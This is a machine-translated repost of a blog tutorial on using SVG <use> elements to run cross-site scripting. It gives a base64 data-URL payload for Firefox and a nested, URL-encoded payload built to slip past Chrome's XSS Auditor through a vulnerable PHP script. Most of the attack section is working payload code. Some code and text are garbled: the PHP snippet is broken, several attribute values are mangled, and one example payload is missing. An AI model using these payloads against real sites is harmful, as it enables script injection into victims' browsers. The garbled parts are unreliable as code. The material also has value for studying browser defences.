"Go" bypasses browser XSS auditing with SVG

Original http://www.cnblogs.com/r00tgrok/p/SVG_Build_XSS_Vector_Bypass_Firefox_And_Chrome.html

====================== SVG-<use> element ======================
The <use> elements in SVG are used to reuse other elements, primarily for joining <defs> and alike, and we use it to refer to elements in an external SVG file
The element is referenced by its ID, starting with the ' # ' well character in the Xlink:href attribute of the <use> tag, and the reference to the external element.
The basic structure is as follows:

Test.html

<svg><xlink:href= ' external.svg#/></svg>  

External.svg:

<svg id= "rectangle" xmlns= "http://www.w3.org/2000/svg " xmlns:xlink= "Http://www.w3.org/1999/xlink" Width= "height="><a xlink:href= "Javascript:alert (location)"><rect x= "0" y= "0" width= " "Height=" /></a></svg>     

The Sxternal.svg file starts with the <svg> tag, its ID is set to rectangle (rectangle), and a rectangle is drawn using the <rect> tag. You can use the <a> surround <rect> tag, which creates a hyperlink. Using JavaScript's URL protocol, clickable hyperlinks execute JavaScript after they are clicked.

Although SVG is loaded via the <use> tag, JavaScript will be executed. It is important to note that it can only load SVG files and must satisfy the same origin policy

======================

FIREFOX ====================== since the loaded external SVG file must be of the same origin, this feature does not seem to be a useful XSS attack vector, but Firefox will help us raise the attack vector
First, you can use the Data:url protocol, which allows us to create a file from the inside in a busy schedule. It requires the right mime-type, here for the image/svg+xml. Mimie-type is our attack payload or keyword base64. In particular, because the data is Base64 encoded, this helps to avoid the problem of breaking through the HTML structure.
Now we no longer have to rely on another file on the server:

Test.html:

<svg><use xlink:href= "data:image/svg+xml;base64, phn2zybpzd0icmvjdgfuz2xliib4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l 3hsaw5riiagicb3awr0ad0imtawiibozwlnahq9ijewmci+dqo8ysb4bgluazpocmvmpsjqyxzhc2nyaxb0omfszxj0kgxvy2f0aw9uksi+ phjly3qged0imciget0imcigd2lkdgg9ijewmcigagvpz2h0psixmdaiic8+pc9hpg0kpc9zdmc+ #rectangle " /></svg> 

Base64 load after decoding:

<svg id= "Rectangle" xmlns= "http://www.w3.org/2000/svg " xmlns:xlink= "Http://www.w3.org/1999/xlink" Width= "height="><a xlink:href= "Javascript:alert (location)"><rect x= "0" y= "0" width= " "Height=" /></a></svg>     

The browser will display a black rectangle, which will pop up when clicked.
But why bother the victim to click, they never do the thing to do:)
The <script> tag in external.svg is not parsed, but the SVG support <foreignObject> element may load non-SVG elements by explaining the extended attributes required by this object
This means that there may be <iframe>, <embed> and all the other supported HTML elements, and we can choose from a bunch of elements to execute JavaScript, which uses <embed>+ Javascripturl protocol
Look at the following SVG:

<svg id= "Rectangle"xmlns= "http://www.w3.org/2000/svg " xmlns:xlink= "Http://www.w3.org/1999/xlink" Width= "height="><script>alert (1) </script><foreignobject width= "height=" 50 "requiredextensions=" http://www.w3.org/1999/xhtml "><embed xmlns=" http://www.w3.org/1999/xhtml " src= "Javascript:alert (location)" /></foreignobject></svg>        

It uses the <foreignObject> to load embedded tags and executes javascript using the Javascripturl protocol
Then we encode the load with Base64 and load it through the data: protocol
Test.html

<svg><use xlink:href= "data:image/svg+xml;base64, phn2zybpzd0icmvjdgfuz2xliib4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l 3hsaw5riiagicb3awr0ad0imtawiibozwlnahq9ijewmci+ Phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg0kidxmb3jlawdut2jqzwn0ihdpzhropsixmdaiighlawdodd0intaidqogicagicagicagicagicagicagcmvxd Wlyzwrfehrlbnnpb25zpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hodg1sij4ncgk8zw1izwqgeg1sbnm9imh0dha6ly93d3cudzmub3jnlze5otkvegh0bw wiihnyyz0iamf2yxnjcmlwddphbgvydchsb2nhdglvbikiic8+dqogicagpc9mb3jlawdut2jqzwn0pg0kpc9zdmc+ #rectangle " /> </svg> 

In this case, Test.html opens with Firefox27, which pops up the location:


So we have another vector in SVG that can execute JavaScript.
In addition, a <script>alert (1) </script> is included in the attack payload, which proves that the <script> tag will not be parsed

======================XSS Auditor Bypass======================
Now use this feature to deal with Chrome,chrome does not support the Data:url protocol in the <use> tag Xlink:href property, and there is no way to execute JavaScript without user interaction.
But at least in the case of right user interaction, you can bypass Blink/webkit XSS Auditor
There is no need for parameter contamination here, one parameter is enough, Blink/webkit XSS Audito cannot capture an XSS attack that splits a parameter into two or more

Check out this PHP script (xss.php):

<? phpecho "<body>";  $_get[' x '];  echo "</body>";? >      

This script has an XSS vulnerability, but using a payload like the following will trigger XSS Auditor:

So let's use the <use> element.

====================== Creating the SVG on the fly ====================== we wanted to load another SVG file, so we started with <svg><use xlink:href= .

But wait, it must meet the same origin, we can not use the data pseudo-protocol, how to get the file on the server?
It's simple, we're two times in a row using XSS vulnerabilities! First, we build a URL that contains an SVG with a JavaScript URL as a pseudo-protocol.

Http://site.com/xss.php?x=<svg id= "Rectangle" xmlns= "http://www.w3.org/2000/svg" xmlns:xlink= "http// Www.w3.org/1999/xlink "width=" "height=" ><a xlink:href= "Javascript:alert (location)" ><rect class = "Blue" x= "0" y= "0" width= "height="/></a></svg>

If you paste the entire URL into a browser that does not have an XSS filter, a black rectangle will appear immediately. But as mentioned earlier, Chrome's XSS auditor will catch this attack, or continue:
Now we're going to use the SVG file created in the <use> element to create a URL like this:

Http://site.com/xss.php?x=<svg><use height=200 width=200xlink:href=' http://vulnerabledomain.com/ Xss.php?x=<svg id= "Rectangle" xmlns= "http://www.w3.org/2000/svg" xmlns:xlink= "Http://www.w3.org/1999/xlink" Width= "height=" ><a xlink:href= "Javascript:alert (location)" ><rect class= "Blue" x= "0" y= "0" width = "height="/></a></svg>#rectangle'/></svg>   

Do not forget to encode the URL:

 http://site.com/xss.php?x=%3csvg%3e%3cuse%20height=200%20width=200%20xlink:href=%27http://site.com/xss.php?x=%3csvg%20id%3d%22rectangle%22%20xmlns%3d%22http%3a%2f%2fwww.w3.org%2f2000%2fsvg%22%20xmlns%3axlink%3d%22http%3a %2f%2fwww.w3.org%2f1999%2fxlink%22%20%20%20%20width%3d%22100%22%20height%3d% 22100%22%3e%3ca%20xlink%3ahref%3d%22javascript%3aalert%28location%29%22%3e%3crect%20class%3d%22blue%22%20x%3d%220%22%20y%3d%220%22%20width%3d%22100%22 %20height%3d%22100%22%20%2f%3e%3c%2fa%3e%3c%2fsvg% 3e%23rectangle%27/%3e%3c/svg%3e            

This should show the rectangle, and the click will execute alert, but this time there is no XSS Auditor triggered:)

"Go" bypasses browser XSS auditing with SVG